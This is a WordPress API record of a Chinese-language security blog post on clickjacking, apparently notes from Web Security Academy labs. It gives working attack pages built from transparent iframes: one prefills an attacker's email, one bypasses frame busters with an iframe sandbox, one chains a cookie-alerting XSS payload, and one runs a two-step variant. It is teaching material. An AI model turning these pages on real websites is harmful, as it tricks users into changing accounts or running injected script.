{"id":1170,"date":"2023-01-29T19:59:00","date_gmt":"2023-01-29T11:59:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1170"},"modified":"2024-02-21T19:55:25","modified_gmt":"2024-02-21T11:55:25","slug":"clickjacking","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1170","title":{"rendered":"Clickjacking"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">\u9ede\u64ca\u52ab\u6301\u662f\u4e00\u7a2e\u57fa\u65bc\u4ecb\u9762\u7684\u653b\u64ca\uff0c\u900f\u904e\u9ede\u64ca\u8a98\u990c\u7db2\u7ad9\u4e2d\u7684\u67d0\u4e9b\u5176\u4ed6\u5167\u5bb9\uff0c\u8a98\u9a19\u7528\u6236\u9ede\u64ca\u96b1\u85cf\u7db2\u7ad9\u4e0a\u7684\u53ef\u64cd\u4f5c\u5167\u5bb9\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5982\uff0c\u53d7\u5bb3\u8005\u9020\u8a2a\u8a98\u990c\u7db2\u7ad9\uff08\u4e5f\u8a31\u9019\u662f\u96fb\u5b50\u90f5\u4ef6\u63d0\u4f9b\u7684\u9023\u7d50\uff09\u4e26\u9ede\u64ca\u6309\u9215\u4f86\u8d0f\u5f97\u734e\u54c1\u3002\u5728\u4e0d\u77e5\u4e0d\u89ba\u4e2d\uff0c\u4ed6\u5011\u88ab\u653b\u64ca\u8005\u6b3a\u9a19\uff0c\u6309\u4e0b\u4e86\u53e6\u4e00\u500b\u96b1\u85cf\u6309\u9215\uff0c\u9019\u5c0e\u81f4\u4e86\u53e6\u4e00\u500b\u7db2\u7ad9\u4e0a\u7684\u5e33\u6236\u7684\u4ed8\u6b3e\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u7bc4\u4f8b\u653b\u64ca\u7db2\u9801\u5982\u4e0b\uff0c\u7576\u53d7\u5bb3\u8005\u958b\u555f\u5f8c\u6703\u986f\u793a\u6b63\u5e38\u7db2\u7ad9$url\u7684\u5167\u5bb9\uff0c \u4e00\u65e6\u53d7\u5bb3\u8005\u9ede\u64ca\u5247\u89f8\u767c\u653b\u64ca\u8005\u9677\u4e95<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;style>\r\n   iframe {\r\n       position:relative;\r\n       width:700px;\r\n       height: 500px;\r\n       opacity: 0.1;\r\n       z-index: 2;\r\n   }\r\n   div {\r\n       position:absolute;\r\n       top:300px;\r\n       left:60px;\r\n       z-index: 1;\r\n   }\r\n&lt;\/style>\r\n&lt;div>Test me&lt;\/div>\r\n&lt;iframe src=\"$url\">&lt;\/iframe><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Basic clickjacking with CSRF token protection<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9810\u586b\u53c3\u6578\u9ede\u64ca\u52ab\u6301<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u60f3\u5c0d\u6b63\u5e38\u7db2\u7ad9\u50b3\u9001<code>email=hacker@attacker-website.com<\/code>\uff0c\u53ef\u6e96\u5099\u4ee5\u4e0b\u653b\u64ca\u7db2\u9801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;style>\r\n   iframe {\r\n       position:relative;\r\n       width:700px;\r\n       height: 500px;\r\n       opacity: 0.1;\r\n       z-index: 2;\r\n   }\r\n   div {\r\n       position:absolute;\r\n       top:300px;\r\n       left:60px;\r\n       z-index: 1;\r\n   }\r\n&lt;\/style>\r\n&lt;div>Click me&lt;\/div>\r\n&lt;iframe src=\"$url?email=hacker@attacker-website.com\">&lt;\/iframe><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Clickjacking with form input data prefilled from a URL paramete<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u9952\u904e\u9ede\u64ca\u52ab\u6301\u4fdd\u8b77<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u76ee\u6a19\u9650\u5236\u7db2\u7ad9\u7684\u6846\u67b6\u80fd\u529b\uff0c\u53ef\u900f\u904eHTML5 iframe<code>sandbox<\/code>\u5c6c\u6027\u9952\u904e\u3002\u7576\u4f7f\u7528<code>allow-forms<\/code>\u6216<code>allow-scripts<\/code>\u503c\u8a2d\u5b9a\u4e26\u4e14<code>allow-top-navigation<\/code>\u7701\u7565\u8a72\u503c\u6642\uff0c\u53ef\u4ee5\u4e2d\u548c\u6846\u67b6\u7834\u58de\u8173\u672c\u3002\u53c3\u8003\u4ee3\u78bc\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;style>\r\n   iframe {\r\n       position:relative;\r\n       width:700px;\r\n       height: 500px;\r\n       opacity: 0.1;\r\n       z-index: 2;\r\n   }\r\n   div {\r\n       position:absolute;\r\n       top:300px;\r\n       left:60px;\r\n       z-index: 1;\r\n   }\r\n&lt;\/style>\r\n&lt;div>Click me&lt;\/div>\r\n&lt;iframe  sandbox=\"allow-forms\" src=\"$url?email=hacker@attacker-website.com\">&lt;\/iframe><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Clickjacking with a frame buster script<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u642d\u914dXSS\u7684\u9ede\u64ca\u52ab\u6301<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u5982\u679c\u76ee\u6a19\u6709XSS\u5f31\u9ede\uff0c\u53ef\u914d\u5408\u8a72\u5f31\u9ede\u4e00\u8d77\u5229\u7528\uff0c\u53c3\u8003\u4ee3\u78bc\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;style>\r\n   iframe {\r\n       position:relative;\r\n       width:700px;\r\n       height: 500px;\r\n       opacity: 0.1;\r\n       z-index: 2;\r\n   }\r\n   div {\r\n       position:absolute;\r\n       top:410px;\r\n       left:100px;\r\n       z-index: 1;\r\n   }\r\n&lt;\/style>\r\n&lt;div>Click me&lt;\/div>\r\n&lt;iframe\r\nsrc=\"https:\/\/acb81f3f1f9f7ad080f913b5004f0069.web-security-academy.net\/feedback?name=&lt;img src=1 onerror=alert(document.cookie)>&amp;email=hacker@attacker-website.com&amp;subject=test&amp;message=test#feedbackResult\">&lt;\/iframe><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e00\u65e6\u53d7\u5bb3\u8005\u958b\u555f\uff0c\u8996\u89d2\u6703\u50cf\u4ee5\u4e0b\u9019\u6a23<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;form id=\"feedbackForm\" action=\"\/feedback\/submit\" method=\"POST\" enctype=\"application\/x-www-form-urlencoded\" personal=\"true\">\r\n     &lt;input required type=\"hidden\" name=\"csrf\" value=\"ANhLQIO9pk6G72DBKikWxhbCBzJHyHmm\">\r\n     &lt;label>Name:&lt;\/label>\r\n     &lt;input required type=\"text\" name=\"name\" value=\"&lt;img src=1 onerror=alert(document.cookie)>\">\r\n     &lt;label>Email:&lt;\/label>\r\n     &lt;input required type=\"email\" name=\"email\" value=\"hacker@attacker-website.com\">\r\n     &lt;label>Subject:&lt;\/label>\r\n     &lt;input required type=\"text\" name=\"subject\" value=\"test\">\r\n     &lt;label>Message:&lt;\/label>\r\n     &lt;textarea required rows=\"12\" cols=\"300\" name=\"message\">test&lt;\/textarea>\r\n     &lt;button class=\"button\" type=\"submit\">\r\n            Submit feedback\r\n     &lt;\/button>\r\n     &lt;span id=\"feedbackResult\">&lt;\/span>\r\n&lt;\/form><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Exploiting clickjacking vulnerability to trigger DOM-based XSS<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u591a\u6b65\u9a5f\u9ede\u64ca\u52ab\u6301<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u653b\u64ca\u8005\u64cd\u7e31\u76ee\u6a19\u7db2\u7ad9\u7684\u8f38\u5165\u53ef\u80fd\u9700\u8981\u63a1\u53d6\u591a\u7a2e\u884c\u52d5\u3002\u4f8b\u5982\uff0c\u653b\u64ca\u8005\u53ef\u80fd\u60f3\u8a98\u9a19\u7528\u6236\u5f9e\u96f6\u552e\u7db2\u7ad9\u8cfc\u8cb7\u5546\u54c1\uff0c\u56e0\u6b64\u9700\u8981\u5728\u4e0b\u8a02\u55ae\u4e4b\u524d\u5c07\u5546\u54c1\u52a0\u5165\u8cfc\u7269\u7c43\u3002\u653b\u64ca\u8005\u53ef\u4ee5\u4f7f\u7528\u591a\u500b\u5206\u5340\u6216 iframe \u4f86\u5be6\u65bd\u9019\u4e9b\u64cd\u4f5c\u3002<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4ee5\u4e0b\u70ba2\u6b65\u9a5f\u7684\u53c3\u8003\u4ee3\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;style>\r\n   iframe {\r\n       position:relative;\r\n       width:700px;\r\n       height: 500px;\r\n       opacity: 0.1;\r\n       z-index: 2;\r\n   }\r\n   .firstClick, .secondClick {\r\n       position:absolute;\r\n       top:350px;\r\n       left:110px;\r\n       z-index: 1;\r\n   }\r\n   .secondClick {\r\n       left:270px;\r\n   }\r\n&lt;\/style>\r\n&lt;div class=\"firstClick\">Click me first&lt;\/div>\r\n&lt;div class=\"secondClick\">Click me next&lt;\/div>\r\n&lt;iframe src=\"https:\/\/ac491f781f41f6d380260340007600ce.web-security-academy.net\/account\">&lt;\/iframe><\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Lab: Multistep clickjacking<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u9ede\u64ca\u52ab\u6301\u662f\u4e00\u7a2e\u57fa\u65bc\u4ecb\u9762\u7684\u653b\u64ca\uff0c\u900f\u904e\u9ede\u64ca\u8a98\u990c\u7db2\u7ad9\u4e2d\u7684\u67d0\u4e9b\u5176\u4ed6\u5167 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[40],"tags":[],"class_list":["post-1170","post","type-post","status-publish","format-standard","hentry","category-clientside"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack-related-posts":[{"id":240,"url":"https:\/\/systw.net\/note\/archives\/240","url_meta":{"origin":1170,"position":0},"title":"CSRF","author":"raymond","date":"2020 \u5e74 8 \u6708 10 \u65e5","format":false,"excerpt":"CSRF(Cross Site Request Forgery) \u60e1\u610f\u7684HTTP\u6307\u4ee4\u88ab\u7576\u6210\u5408\u6cd5\u7684\u6307\u4ee4\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2733,"url":"https:\/\/systw.net\/note\/archives\/2733","url_meta":{"origin":1170,"position":1},"title":"Web3 Phishing","author":"raymond","date":"2024 \u5e74 8 \u6708 26 \u65e5","format":false,"excerpt":"Web3 \u91e3\u9b5a\u653b\u64ca\u662f\u4e00\u7a2e\u91dd\u5c0d\u5340\u584a\u93c8\u7528\u6236\u7684\u8a50\u9a19\u884c\u70ba\uff0c\u65e8\u5728\u8a98\u9a19\u7528\u6236\u6388\u6b0a\u6216\u8f49\u79fb\u4ed6\u5011\u7684\u52a0\u5bc6\u8cc7\u7522\uff08\u5982\u4ee3\u5e63\u3001NF\u2026","rel":"","context":"\u5728\u300cBlockchain Security\u300d\u4e2d","block_context":{"text":"Blockchain Security","link":"https:\/\/systw.net\/note\/archives\/category\/%e5%8d%80%e5%a1%8a%e9%8f%88\/blockchain-security"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":2597,"url":"https:\/\/systw.net\/note\/archives\/2597","url_meta":{"origin":1170,"position":2},"title":"Google Black Hat SEO","author":"raymond","date":"2024 \u5e74 8 \u6708 14 \u65e5","format":false,"excerpt":"Google \u9ed1\u5e3d SEO\u662f\u4e00\u7a2e\u9055\u53cd Google \u641c\u5c0b\u5f15\u64ce\u6307\u5357\u7684\u512a\u5316\u624b\u6cd5\uff0c\u76ee\u7684\u662f\u5feb\u901f\u4e14\u975e\u6b63\u7576\u5730\u63d0\u5347\u2026","rel":"","context":"\u5728\u300cConcept\u300d\u4e2d","block_context":{"text":"Concept","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/concept"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1264,"url":"https:\/\/systw.net\/note\/archives\/1264","url_meta":{"origin":1170,"position":3},"title":"DOM XSS to open redirection","author":"raymond","date":"2023 \u5e74 2 \u6708 19 \u65e5","format":false,"excerpt":"\u653b\u64ca\u8005\u5982\u679c\u53ef\u4ee5\u5f71\u97ff\u8de8\u57df\u7528\u7684sink\u6642\uff0c\u5c31\u6703\u51fa\u73fe\u57fa\u65bc DOM \u7684\u958b\u653e\u91cd\u5b9a\u5411\u6f0f\u6d1e\u3002\u5982\u679c\u6709\u6b64\u6f0f\u6d1e\uff0c\u53ef\u4ee5\u5229\u7528\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1105,"url":"https:\/\/systw.net\/note\/archives\/1105","url_meta":{"origin":1170,"position":4},"title":"CORS","author":"raymond","date":"2023 \u5e74 1 \u6708 13 \u65e5","format":false,"excerpt":"CORS\uff08Cross-Origin Resource Sharing\uff09\u7684\u57fa\u672c\u539f\u7406\u662f\uff0c\u7db2\u7ad9\u4f3a\u670d\u5668\u7522\u751f\u8a2a\u2026","rel":"","context":"\u5728\u300cClientSide\u300d\u4e2d","block_context":{"text":"ClientSide","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/clientside"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":1465,"url":"https:\/\/systw.net\/note\/archives\/1465","url_meta":{"origin":1170,"position":5},"title":"OAuth Client Application\u00a0","author":"raymond","date":"2023 \u5e74 3 \u6708 27 \u65e5","format":false,"excerpt":"OAuth\u898f\u7bc4\u7684\u5b9a\u7fa9\u76f8\u5c0d\u5bec\u9b06\uff0c\u6bcf\u7a2e\u6388\u6b0a\u985e\u578b\u90fd\u6709\u8a31\u591a\u53ef\u9078\u53c3\u6578\u548c\u914d\u7f6e\u8a2d\u7f6e\uff0c\u9019\u610f\u5473\u8457\u932f\u8aa4\u914d\u7f6e\u7684\u7bc4\u570d\u5f88\u5927\u3002\u56e0\u2026","rel":"","context":"\u5728\u300cLogic Vulnerabilities\u300d\u4e2d","block_context":{"text":"Logic Vulnerabilities","link":"https:\/\/systw.net\/note\/archives\/category\/hackerthreat\/logic-vulnerabilities"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1170"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1170\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}